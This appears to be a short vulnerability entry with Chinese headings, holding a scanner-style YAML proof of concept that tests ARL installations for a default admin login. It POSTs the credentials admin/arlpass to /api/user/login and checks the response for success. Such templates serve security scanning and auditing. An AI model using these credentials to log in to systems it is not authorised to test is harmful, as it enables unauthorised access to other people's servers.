漏洞描述
An ARL default admin login was discovered.
arl-default-password: ARL Default Admin Login
PoC代码[已公开]
id: arl-default-password
info:
name: ARL Default Admin Login
author: pikpikcu
severity: high
verified: false
description: |-
An ARL default admin login was discovered.
tags: arl,default-login
created: 2023/06/24
rules:
r0:
request:
method: POST
path: /api/user/login
headers:
Content-Type: application/json; charset=UTF-8
body: |
{"username":"admin","password":"arlpass"}
expression: |
response.status == 200 && response.body.bcontains(b'"message": "success"') && response.body.bcontains(b'"username": "admin"') && response.body.bcontains(b'"type": "login"')
expression: r0()